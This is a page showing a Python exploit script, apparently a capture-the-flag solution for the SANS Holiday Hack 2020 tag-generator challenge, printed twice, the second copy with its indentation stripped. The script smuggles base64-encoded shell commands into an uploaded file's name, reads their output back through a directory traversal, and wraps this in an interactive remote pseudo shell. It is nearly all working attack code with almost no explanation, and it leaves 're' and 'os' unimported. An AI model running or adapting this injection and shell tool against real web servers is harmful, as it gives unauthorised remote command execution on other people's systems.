reigningshells · January 23, 2021 15:04
diff --git a/HH2020-tag-generator-pseudo-shell.py b/HH2020-tag-generator-pseudo-shell.py
 #!/usr/bin/env python3

 import sys
 import argparse
 import string
 import random
 import requests
 import urllib3
 import base64
 import readline

 # Nobody wants to see SSL warnings :-P
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 # Exploit command injection
 def run_command(cmd):
 	url = 'https://tag-generator.kringlecastle.com/upload'
 	headers = {'User-Agent': useragent}
 	encoded_command = base64.b64encode(cmd.encode()).decode()
 	files = {'my_file[]': ("test.'; echo '{0}' | base64 -d | bash > {1}; png".format(encoded_command,random_filename), 'safe', 'image/png')}
 	try:
 		requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
 		return
 	except Exception as e:
 		print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

 # Exploit directory traversal
 def get_results():
 	url = 'https://tag-generator.kringlecastle.com/image?id={0}'.format(random_filename)
 	headers = {'User-Agent': useragent}
 	try:
 		r = requests.get(url,headers=headers,proxies=proxies,verify=False)
 		if r.status_code == requests.codes.ok:
 			return r.text
 		else:
 			return ''
 	except Exception as e:
 		print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

 # Primary function to call to execute a command
 def execute_command(cmd):
 	run_command(cmd)
 	output = get_results()
 	run_command('echo \'\'')
 	return output

 # Cleanup our temporary file we have been writing to, don't want to leave a mess
 def clean_up():
 	url = 'https://tag-generator.kringlecastle.com/upload'
 	headers = {'User-Agent': useragent}
 	cmd = 'rm {0}'.format(random_filename)
 	files = {'my_file[]': ("test.'; {0}; png".format(cmd), 'safe', 'image/png')}
 	r = requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)

 if __name__ == "__main__":
 
 	parser = argparse.ArgumentParser(
 	description='Holiday Hack 2020 Tag Generator Pseudo Shell',
 	epilog = '''
 Examples:
 {0}
 {0} -p http://127.0.0.1:8080
 {0} -p http://127.0.0.1:8080 -u \'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \''''.format(sys.argv[0]),
 	formatter_class=argparse.RawDescriptionHelpFormatter)
 
 	parser.add_argument('-p', '--proxy', help='Proxy example: http://127.0.0.1:8080', required=False, default=None, type=str, dest='proxy')
 	parser.add_argument('-u', '--useragent', help='User agent string to make requests with', required=False, default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', type=str, dest='useragent')
 
 	args = parser.parse_args()
 
 	# Global Variables
 
 	useragent = args.useragent
 	if args.proxy:
 		proxies = {'http': args.proxy, 'https': args.proxy}
 	else:
 		proxies = None

 	random_filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(32))
 	
 	# Populate the prompt

 	username = execute_command("whoami").strip()
 	if len(username) == 0:
 		exit(1)
        
 	hostname = execute_command("hostname").strip()

 	path = execute_command("pwd").strip()

 	print("\n[*] Returning prompt!\n")

 	# Interact with pseudo shell

 	try:
 		while True:
 			prompt = username + "@" + hostname + ":" + path + "$ " 
 			cmd = input(prompt)
 			if cmd == "exit":
 				print("\n[*] Goodbye!\n")
 				break
 			elif cmd.startswith("cd "):
 				chars = set(";&|")
 				if any((c in chars) for c in cmd):
 					print("[!] This shell only supports cd as a standalone command.")
 				else:
 					cmd = cmd.split()
 					tmpPath = " ".join(cmd[1:])
 					if tmpPath == "..":
 						if len(path.split("/")) > 2:
 							tmpPath = "/".join(path.split("/")[:-1])
 						else:
 							tmpPath = "/"
 					cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
 					tmpPath = execute_command(cmd).strip()
 					if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
 						path = tmpPath
 					else:
 						path = tmpPath.split('\n')[0]
 			elif cmd == "clear":
 				os.system("clear")
 			else:
 				cmd = "cd " + path + " && " + cmd
 				results = execute_command(cmd)
 				if len(results) != 0:
 					print(results)

 		clean_up()

 	except KeyboardInterrupt:
 		print("\n\n[*] Goodbye!\n")
 		clean_up()
	#!/usr/bin/env python3

	import sys
	import argparse
	import string
	import random
	import requests
	import urllib3
	import base64
	import readline

	# Nobody wants to see SSL warnings :-P
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	# Exploit command injection
	def run_command(cmd):
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	encoded_command = base64.b64encode(cmd.encode()).decode()
	files = {'my_file[]': ("test.'; echo '{0}' \| base64 -d \| bash > {1}; png".format(encoded_command,random_filename), 'safe', 'image/png')}
	try:
	requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
	return
	except Exception as e:
	print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

	# Exploit directory traversal
	def get_results():
	url = 'https://tag-generator.kringlecastle.com/image?id={0}'.format(random_filename)
	headers = {'User-Agent': useragent}
	try:
	r = requests.get(url,headers=headers,proxies=proxies,verify=False)
	if r.status_code == requests.codes.ok:
	return r.text
	else:
	return ''
	except Exception as e:
	print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))

	# Primary function to call to execute a command
	def execute_command(cmd):
	run_command(cmd)
	output = get_results()
	run_command('echo \'\'')
	return output

	# Cleanup our temporary file we have been writing to, don't want to leave a mess
	def clean_up():
	url = 'https://tag-generator.kringlecastle.com/upload'
	headers = {'User-Agent': useragent}
	cmd = 'rm {0}'.format(random_filename)
	files = {'my_file[]': ("test.'; {0}; png".format(cmd), 'safe', 'image/png')}
	r = requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)

	if __name__ == "__main__":

	parser = argparse.ArgumentParser(
	description='Holiday Hack 2020 Tag Generator Pseudo Shell',
	epilog = '''
	Examples:
	{0}
	{0} -p http://127.0.0.1:8080
	{0} -p http://127.0.0.1:8080 -u \'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \''''.format(sys.argv[0]),
	formatter_class=argparse.RawDescriptionHelpFormatter)

	parser.add_argument('-p', '--proxy', help='Proxy example: http://127.0.0.1:8080', required=False, default=None, type=str, dest='proxy')
	parser.add_argument('-u', '--useragent', help='User agent string to make requests with', required=False, default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', type=str, dest='useragent')

	args = parser.parse_args()

	# Global Variables

	useragent = args.useragent
	if args.proxy:
	proxies = {'http': args.proxy, 'https': args.proxy}
	else:
	proxies = None

	random_filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(32))

	# Populate the prompt

	username = execute_command("whoami").strip()
	if len(username) == 0:
	exit(1)

	hostname = execute_command("hostname").strip()

	path = execute_command("pwd").strip()

	print("\n[*] Returning prompt!\n")

	# Interact with pseudo shell

	try:
	while True:
	prompt = username + "@" + hostname + ":" + path + "$ "
	cmd = input(prompt)
	if cmd == "exit":
	print("\n[*] Goodbye!\n")
	break
	elif cmd.startswith("cd "):
	chars = set(";&\|")
	if any((c in chars) for c in cmd):
	print("[!] This shell only supports cd as a standalone command.")
	else:
	cmd = cmd.split()
	tmpPath = " ".join(cmd[1:])
	if tmpPath == "..":
	if len(path.split("/")) > 2:
	tmpPath = "/".join(path.split("/")[:-1])
	else:
	tmpPath = "/"
	cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
	tmpPath = execute_command(cmd).strip()
	if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
	path = tmpPath
	else:
	path = tmpPath.split('\n')[0]
	elif cmd == "clear":
	os.system("clear")
	else:
	cmd = "cd " + path + " && " + cmd
	results = execute_command(cmd)
	if len(results) != 0:
	print(results)

	clean_up()

	except KeyboardInterrupt:
	print("\n\n[*] Goodbye!\n")
	clean_up()